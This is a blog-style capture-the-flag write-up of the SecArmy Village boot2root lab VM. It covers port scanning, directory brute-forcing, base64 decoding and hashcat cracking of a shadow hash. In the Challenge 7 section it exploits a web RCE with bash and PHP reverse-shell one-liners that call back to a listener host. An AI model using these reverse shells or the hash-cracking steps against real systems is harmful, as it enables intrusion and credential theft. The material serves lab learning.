Sec Army CTF 2020

Sec Army is a cybersecurity community that hosts events like CTF ,webinar,virtual conferences and help the community grow. Recently they arranged a CTF which ran from 29th of October to 31st October (GMT+5:30)

The CTF was like a jeopardy type but in boot2root fashion, To start your challenge a virtual image by the organizers was uploaded on vulnhub. There were 10 challenges on the box .

The giveaway in this competition were Three OSCP certification with free exam voucher and 60 days lab time , Winners were choosen randomly by the ogranizers.

NMAP

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-29 18:11 PKT
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 18:11 (0:00:12 remaining)
Nmap scan report for 192.168.1.5
Host is up (0.00012s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.7
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2c:54:d0:5a:ae:b3:4f:5b:f8:65:5d:13:c9:ee:86:75 (RSA)
| 256 0c:2b:3a:bd:80:86:f8:6c:2f:9e:ec:e4:7d:ad:83:bf (ECDSA)
|_ 256 2b:4f:04:e0:e5:81:e4:4c:11:2f:92:2a:72:95:58:4e (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Totally Secure Website
MAC Address: 08:00:27:4D:91:E3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Challenge 1 (Uno)

By visting the web page which is hosted on PORT 80 we will given task 1 to solve

Now it says that there might be a hidden directory so lets brute force directory

gobuster dir -u http://192.168.1.5:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Here we can see /anon so let's visit this directory

Now you won’t see the text because it is hidden by making the text color white so it’s important select all text or visit the source code of page

This may be credentials for the user for ssh lets try doing that

And we got in , got a foothold!

We easily solved the challenge

But there is a readme.txt file which says

Challenge 2 (Dos)

The readme.txt file which you have just read gives password for the user dos lets see if that user actually exists on this box

root:x:0:0:root:/root:/bin/bash                                           
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
uno:x:1001:1001:,,,:/home/uno:/bin/bash
dos:x:1002:1002:,,,:/home/dos:/bin/bash
tres:x:1003:1003:,,,:/home/tres:/bin/bash
cuatro:x:1004:1004:,,,:/home/cuatro:/bin/bash
cinco:x:1005:1005:,,,:/home/cinco:/bin/bash
seis:x:1006:1006:,,,:/home/seis:/bin/bash
siete:x:1007:1007:,,,:/home/siete:/bin/bash
ocho:x:1008:1008:,,,:/home/ocho:/bin/bash
nueve:x:1009:1009:,,,:/home/nueve:/bin/bash
ftp:x:108:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
cero:x:1000:1000:,,,:/home/cero:/bin/bash

And appearenlty he does ! So let’s try to use switch user

We successfully switched to don

dos@svos:~$ ls -la
total 180
drwx------ 7 dos dos 4096 Oct 19 19:46 .
drwxr-xr-x 12 root root 4096 Oct 19 11:05 ..
-rw-rw-r-- 1 dos dos 47 Oct 5 09:24 1337.txt
-rw-r--r-- 1 dos dos 220 Sep 22 11:36 .bash_logout
-rw-r--r-- 1 dos dos 3771 Sep 22 11:36 .bashrc
drwx------ 2 dos dos 4096 Sep 22 12:49 .cache
drwx------ 2 dos dos 4096 Sep 22 13:59 .elinks
drwxr-xr-x 2 dos dos 135168 Sep 27 14:51 files
drwx------ 3 dos dos 4096 Sep 22 12:49 .gnupg
drwxrwxr-x 3 dos dos 4096 Sep 22 13:24 .local
-rw-r--r-- 1 dos dos 807 Sep 22 11:36 .profile
-rw-rw-r-- 1 dos dos 104 Sep 23 09:52 readme.txt
dos@svos:~$ cat readme.txt
You are required to find the following string inside the files folder:
a8211ac1853a1235d48829414626512a
dos@svos:~$

Now this says to find a8211ac1853a1235d48829414626512a this string which actually a md5 hash in folder files but problem is that that folder has 5001 text files

To be honest I did’nt know the command for looking for a text in files so I just used google

That returned me the result that I wanted

Now it’s telling you to look at file3131.txt which gives us

UEsDBBQDAAAAADOiO1EAAAAAAAAAAAAAAAALAAAAY2hhbGxlbmdlMi9QSwMEFAMAAAgAFZI2Udrg
tPY+AAAAQQAAABQAAABjaGFsbGVuZ2UyL2ZsYWcyLnR4dHPOz0svSiwpzUksyczPK1bk4vJILUpV
L1aozC8tUihOTc7PS1FIy0lMB7LTc1PzSqzAPKNqMyOTRCPDWi4AUEsDBBQDAAAIADOiO1Eoztrt
dAAAAIEAAAATAAAAY2hhbGxlbmdlMi90b2RvLnR4dA3KOQ7CMBQFwJ5T/I4u8hrbdCk4AUjUXp4x
IsLIS8HtSTPVbPsodT4LvUanUYff6bHd7lcKcyzLQgUN506/Ohv1+cUhYsM47hufC0WL1WdIG4WH
80xYiZiDAg8mcpZNciu0itLBCJMYtOY6eKG8SjzzcPoDUEsBAj8DFAMAAAAAM6I7UQAAAAAAAAAA
AAAAAAsAJAAAAAAAAAAQgO1BAAAAAGNoYWxsZW5nZTIvCgAgAAAAAAABABgAgMoyJN2U1gGA6WpN
3pDWAYDKMiTdlNYBUEsBAj8DFAMAAAgAFZI2UdrgtPY+AAAAQQAAABQAJAAAAAAAAAAggKSBKQAA
AGNoYWxsZW5nZTIvZmxhZzIudHh0CgAgAAAAAAABABgAAOXQa96Q1gEA5dBr3pDWAQDl0GvekNYB
UEsBAj8DFAMAAAgAM6I7USjO2u10AAAAgQAAABMAJAAAAAAAAAAggKSBmQAAAGNoYWxsZW5nZTIv
dG9kby50eHQKACAAAAAAAAEAGACAyjIk3ZTWAYDKMiTdlNYBgMoyJN2U1gFQSwUGAAAAAAMAAwAo
AQAAPgEAAAAA

If you have done some CTF’s the works thing that should come to your mind is that this is a base64 encoded text :D

Head over to cyberchef

You might see something like this challenge2/flag2.txt

Hover your curosr next to Output on that something like a magic stick icon and you'll get your second flag

We can see a text from todo.txt

Although its total WASTE but... here's your super secret token: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b

Challegne 3 (Tres)

As on the user dos’s directory we can see a hint that

dos@svos:~$ cat 1337.txt 
Our netcat application is too 1337 to handle..

This refers to port 1337 on the box so

I tried looking for a parameter ?p=1 , ?secret=2, ?token=3 , ?waste=3 but since this isn't a php file hosted these won't work

Then I focused on the hint and it was mentioned netcat application is too 1337 to handle . I quickly visited goolge for answers

https://unix.stackexchange.com/questions/332163/netcat-send-text-to-echo-service-read-reply-then-exit

I did find something

echo that token and pipe it to netcat by specifing IP and port

Challenge 4 (Cuatro)

Now we are in as tres so let's start exploring his home directory

Now we are presented with a binary exploitation challenge(Buffer Overflow) , we can see a binary file secarmy-village . But running it gives us an error

I couldn’t figure it out what was I supposed to fix in this binary , I had an idea to do something with ghidra but I failed to do it .

Challenge 5 (Cinco)

when you visit /var/www/html this is where your webpage are being hosted , on visiting we can find directories and webpages there

anon directory was the one which we came to know through gobuster so we know that these will be shown or port80 , let's try justanothergallery

It has an index.php page and a sub directory of qr which contains a lot of qr code images that we scan

We can this qr code from any qr android application which can be downloaded through playstore or from wherever you prefer

By scanning this qr code we will get the text presented

image-0 Hello
image-1 and
image-2 congrats
image-3 for
image-4 solving
image-5 this
image-6 challenge,
image-7 we
image-8 hope
image-9 that
image-10 you
image-11 enojoyed
image-12 the
image-13 challenges
image-14 we
image-15 presented
image-16 so
image-17 far.
image-18 It
image-19 is
image-20 time
image-21 for
image-22 us
image-23 to
image-24 increase
image-25 the
image-26 difficulty
image-27 level
image-28 and
image-29 make
image-30 the
image-31 upcoming
image-32 challenges
image-33 more
image-34 challenging
image-35 than
image-36 previous
image-37 ones.
image-38 Before
image-39 you
image-40 move
image-41 to
image-42 the
image-43 next
image-44 challenge,
image-45 here
image-46 are
image-47 the
image-48 credentials
image-49 for
image-50 the
image-51 5th
image-52 user
image-53 cinco:ruy70m35
image-54 head
image-55 over
image-56 to
image-57 this
image-58 user
image-59 and
image-60 get
image-61 your
image-62 5th
image-63 flag!
image-64 goodluck

Ahhhh , so I scanned the 64 qr images through my phone and got credentials for cinco:ruy70m35

Now the readme.txt says

cinco@svos:~$ cat readme.txt 
Check for Cinco's secret place somewhere outside the house
cinco@svos:~$

By “looking outside the house” it means to look outside the ~ (home) directory

Here we find cincos-secrets

This is all we get at cincos-secrets

We know that shadow.bak which is backup of the original shadow file belongs to cincos so we can change permissions for the file since it belongs to us

It doesn’t matter which permissions you give but in a real sceanrio you should give permissions to that specific user like this

chmod u+rwx shadow.bak or depending upon the type of file it is Or

chmod 700 shadow.bak

On reading file we will see a hash

seis:$6$MCzqLn0Z2KB3X3TM$opQCwc/JkRGzfOg/WTve8X/zSQLwVf98I.RisZCFo0mTQzpvc5zqm/0OJ5k.PITcFJBnsn7Nu2qeFP8zkBwx7.:18532:0:99999:7:::

We already know from the hint that we need to user rockyou.txt

Copy this whole hash and put it in a file , not necessary to give a txt extension. Now you can either use john the ripper or hashcat , for me john the ripper was taking too long so I used hashcat (although it doesn't work sometimes on windows but it dit work :D)

hashcat -a 0 -m 1800 -o cracked.txt hash /usr/share/wordlists/rockyou.tx

Challenge 6 (Seis)

I didn’t solve this one in order xD

Challenge 7 (Siete)

Visiting /var/www/html we will see shellcmsdashboard so lets hop over to that directory

Coming back to the box , we can a robots.txt by reading it we can a password there

On giving the right credentials , it’s going to point us to go on the next page

Now this here is a RCE vulnerability , we can give any command we want and it will execute this for us

Now we have seen that there was readme9213.txt we can easily read it because we are www-data in this case and that file belongs it .

But doing cat readme9213.txt won't give us the result so we need a reverse shell in order to read that file.

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

bash -i >& /dev/tcp/192.168.1.7/4444 0>&1 — This did’nt worked php -r ‘$sock=fsockopen(“192.168.1.7”,4444);exec(“/bin/sh -i <&3 >&3 2>&3”);’ This did

We cannot read the file because it’s permissions are to just write and execute but since it belongs to us we can pretty much change it to readable.

/var/www/html/shellcmsdashboard
$ cat readme9213.txt
cat: readme9213.txt: Permission denied
$ ls -la
total 24
drwxrwxrwx 2 root root 4096 Oct 18 15:02 .
drwxr-xr-x 5 root root 4096 Oct 8 17:51 ..
-rwxrwxrwx 1 root root 1459 Oct 1 17:57 aabbzzee.php
-rwxrwxrwx 1 root root 1546 Oct 18 15:02 index.php
--wx-wx-wx 1 www-data root 48 Oct 8 17:54 readme9213.txt
-rwxrwxrwx 1 root root 58 Oct 1 17:37 robots.txt
$ chmod u=rwx readme9213.txt
$ cat readme9213.txt
password for the seventh user is 6u1l3rm0p3n473
$

Hint is given which tells that the message is a decimal text

On decoding the message from decimal we get

I wasn’t able to solve this challenge so couldn’t proceed any further.

So I didn’t see how the remaining challenges looked like , although it was easy but I didn’t had that much exposure to CTF competitions.

You can try the CTF by yourself if you really want to here is the link to the machine you can download and import to virtual box. (Size of image is 1.6 GB )

Machine URL: https://www.vulnhub.com/entry/secarmy-village-grayhat-conference,585/
Alternate URL: https://drive.google.com/file/d/1WlSyy8OgcV-hDaRVa4iMvAmLBEoTMLkN/view?usp=sharing

--

--

--

Pentester | CTF Player

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

BrillLock Fingerprint Door Lock review: Biometric security on a budget

Secure your web application with these HTTP headers

5 Laws That'll Help the Social security office mobile AL Industry

OS Command Injection Vulnerability- A beginner’s guide

GCP Security Best Practices

How to Secure a SuperApp

Exploring File Storing & Memory Capacity In Internet Computer Canisters

How Browsers validate SSL Certificates

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ARZ101

ARZ101

Pentester | CTF Player

More from Medium

HackTheBox — Backdoor

Tryhackme: Wonderland writeup

Responder 🚨 HackTheBox | Walkthrough

TryHackMe | Linux Forensics